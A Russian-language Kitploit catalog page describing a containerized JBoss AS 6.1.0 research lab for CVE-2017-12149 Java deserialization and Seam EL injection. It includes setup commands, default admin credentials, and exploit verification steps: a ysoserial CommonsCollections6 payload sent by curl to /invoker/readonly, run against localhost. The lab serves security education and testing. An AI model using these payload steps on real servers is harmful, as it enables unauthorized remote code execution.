Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2017-12149-playground — Контейнеризованная исследовательская лаборатория JBoss AS 6.1.0 для демонстрации уязвимостей Java Deserialization (CVE-2017-12149) и JBoss Seam EL Injection с предварительно настроенными шагами проверки эксплойта. | Kitploit
Инструменты/GitHubGitHub/galois17/cve-2017-12149-playground
Безопасность контейнеровАнализ уязвимостейЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЭксплуатация Бинарных Файлов
GitHubgalois17/cve-2017-12149-playground

cve-2017-12149-playground

Контейнеризованная исследовательская лаборатория JBoss AS 6.1.0 для демонстрации уязвимостей Java Deserialization (CVE-2017-12149) и JBoss Seam EL Injection с предварительно настроенными шагами проверки эксплойта.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
7 месяцев назадЕщё не проверено

Многие критически важные отрасли (банковское дело, здравоохранение, производство) полагаются на устаревшее связующее ПО, которое было создано специально для работы на JBoss 5 или 6. Поскольку такие приложения часто слишком хрупки для миграции на современные версии WildFly (преемника JBoss), организации предпочитают «изолировать» их или прятать за VPN, а не обновлять. Когда периметровая защита пробита, уязвимость по-прежнему остается живой и незакрытой.

Лаборатория исследования уязвимостей JBoss AS 6.1.0

Этот репозиторий предоставляет контейнеризованную среду JBoss Application Server 6.1.0, специально настроенную для исследований безопасности и верификации уязвимостей. Она предназначена для демонстрации ошибок десериализации Java и EL-инъекций JBoss Seam.


Быстрый старт

1. Сборка и запуск

Чтобы пользовательские учетные данные и конфигурации были применены корректно, соберите контейнер с нуля:

root@kitploit:~
docker-compose build --no-cache
docker-compose up -d

2. Доступ к среде

Консоль JBoss: http://localhost:8080/admin-console/

Имя пользователя: admin

Пароль: admin

Подтвержденные уязвимости

1. Десериализация Java (CVE-2017-12149)

Самый надежный путь эксплуатации в этой среде — через HTTPServerILServlet, расположенный по адресу /invoker/readonly.

Шаги верификации:

Сгенерируйте полезную нагрузку с помощью ysoserial для создания файла в /tmp:

root@kitploit:~
java -jar ysoserial-all.jar CommonsCollections6 "touch /tmp/pwned" > poc.ser

Отправьте бинарную нагрузку через curl:

root@kitploit:~
curl -v -X POST --data-binary @poc.ser http://localhost:8080/invoker/readonly

Подтвердите успешность эксплуатации:

root@kitploit:~
docker exec -it jboss-custom-lab ls /tmp/pwned

Предупреждение по безопасности Эта среда намеренно содержит уязвимости. Она использует необновленное, снятое с поддержки программное обеспечение.

НЕ разворачивайте её на публичном сервере.

НЕ используйте эти инструменты в системах, на тестирование которых у вас нет явного разрешения.

Разработано в образовательных целях и для исследований в области безопасности.

Зависимости: https://github.com/frohoff/ysoserial

Скачать инструмент